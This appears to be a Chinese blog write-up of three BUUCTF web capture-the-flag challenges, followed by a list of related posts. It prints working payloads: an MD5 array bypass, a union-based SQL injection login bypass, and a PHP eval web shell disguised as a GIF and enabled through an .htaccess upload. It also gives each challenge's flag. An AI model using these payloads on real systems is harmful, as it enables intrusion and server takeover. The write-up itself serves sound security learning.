BUUCTF Web [MRCTF2020]Ez_bypass1 [GXYCTF2019]BabySQli1 [GXYCTF2019]BabyUpload1
目录
[MRCTF2020]Ez_bypass1
[GXYCTF2019]BabySQli1
[GXYCTF2019]BabyUpload1
[MRCTF2020]Ez_bypass1
启动靶机,右键查看源代码
代码审计,GET传两个参数:id 和 gg。POST传passwd。需要满足的条件:1.id和gg值不同,但md5(id)== md(gg); 2.passwd==1234567,但passwd不能纯数字 。
思路: id 和 gg 直接传两个不同数组(md5(数组)== NULL) ,passwd传1234567abc
构造payload
GET: /?id[]=1&gg[]=2
POST: passwd=1234567abc
拿到flag flag{20097f40-8b61-451c-a588-56b65732a9ca}
[GXYCTF2019]BabySQli1
启动靶机,输个弱口令抓个包看看
发现一行注释的一行,复制到base32在线解密
再复制到base64在线解密
估计是提示我们后端的sql语句
select * from user where username = '$name'
知道了username,但是不知道password在后端是怎样查询的。看了下大佬的wp,查询三个字段id,username,password,但我们穿的password有个md5加密,所以构造payload
name=-1' union select 1,'admin',NULL#&pw[]=1
传的pw是数组,md5[数组] = NULL
拿到flag flag{42515684-4641-44ac-81d3-aa348b07fbbf}
[GXYCTF2019]BabyUpload1
启动靶机,熟悉的文件上传,先上传个shell.php看看
看来phtml绕黑名单也不可行了,尝试.pHp ,发现也不行。懒得尝试了,直接传图片马吧。
GIF89a
<script language=php>eval($_POST[1]);</script>
forward放包
由于上传的文件以jpg存储,所以恶意代码无法执行,需要再上传一个.htaccess文件
再访问一下图片马
感觉上传成功了,蚁剑连接
拿到flag flag{bb2bcb49-44e2-4583-bf58-49a20306eedd}
BUUCTF Web [MRCTF2020]Ez_bypass1 [GXYCTF2019]BabySQli1 [GXYCTF2019]BabyUpload1相关推荐
- BUUCTF Web 第二页全部Write ups
更多笔记,可以关注yym68686.top 目录 [强网杯 2019]高明的黑客 [BUUCTF 2018]Online Tool [RoarCTF 2019]Easy Java [GXYCTF201 ...
- Buuctf -web wp汇总(一)
Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接 持续更新ing~ BuuCTF平台 文章目录 BuuCTF平台 [极客大挑战 2019]EasySQL [极 ...
- Buuctf -web wp汇总(三)
Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接 Buuctf -web wp汇总(三):链接 文章目录 [WUSTCTF2020]朴实无华 [WUSTCTF ...
- BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此
BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此 进入环境后得到源码 <?phperror_reporting(0); $text = $_GET["text&quo ...
- BUUCTF Web 极客大挑战 2019 EasySQL
BUUCTF Web 极客大挑战 2019 EasySQL 文章目录 BUUCTF Web 极客大挑战 2019 EasySQL 1,输入万能密码: 2,输入万能账号 首先有点常识: 正常SQL语句这 ...
- BUUCTF WEB [BSidesCF 2020]Had a bad day
BUUCTF WEB [BSidesCF 2020]Had a bad day index.php?category=woofers' 报错 Warning: include(woofers'.php ...
- BUUCTF WEB [BJDCTF2020]The mystery of ip
BUUCTF WEB [BJDCTF2020]The mystery of ip 在hint.php中找到一句注释 <!-- Do you know why i know your ip? -- ...
- BUUCTF WEB [极客大挑战 2019]LoveSQL
BUUCTF WEB [极客大挑战 2019]LoveSQL 进入靶机后尝试万能密码登录 admin 123' or '1'='1 获得flag Login Success! Hello admin! ...
- BUUCTF Web [GXYCTF2019]Ping Ping Ping
「作者主页」:士别三日wyx 此文章已录入专栏<网络攻防>,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之 ...
最新文章
- python开发效率最高_公认8个效率最高的爬虫框架
- CentOS7_装机软件推荐
- Django 的操作
- java 转换成时间戳_Java 实例 – 时间戳转换成时间 - Java 基础教程
- 目标检测二十年间那些事儿——加速与优化
- oracle进入rman报错,Oracle学习系列之Rman学习(三)
- tensor.view(*shape) 函数
- 计算机网络孙家启,孙家启
- live2d碰撞_Unity Live2D 模型(与UI)拖拽功能 实现源码
- 聚类算法效果衡量标准
- 高通SM660平台GPS 简介
- elasticsearch minimum_should_match
- 【操作系统原理-2014年清华陈渝老师】索引
- flash加载图片 代码_消失的人:Flash中的图片加载器和随机链接应用
- 义帝熊心--秦末汉初
- 淡水鱼生鱼片含有大量肝吸虫 可寄生于肝脏内30年
- 坐南京13路公交车,体验《头文字D》感觉!
- SSD与HDD如何混合组raid并永久挂载硬盘?
- 密码爆破工具:Medusa(美杜莎)-操作说明
- 产品众测 | 移动互联网保险展业工具竞品分析
热门文章
- 16进制转8进制 两种方法先转二进制在转8进制或先转10进制在转8进制
- 关于中国软件发展的讨论沙龙
- 【latex algorithm2e】持续更新
- linux复制文件夹中前N个文件到其他目录下
- C语言之NULL的含义
- java中this.getclass(),Java中关于this.getClass()与super.getClass()的案例
- Julia循环结构_for循环_2020-04-23
- iptables防火墙开放、关闭某端口
- qprocess回调_Qt图形编程基础之:Qt/Embedded开发入门-嵌入式系统-与非网
- Enter passphrase for key(输入密码短语)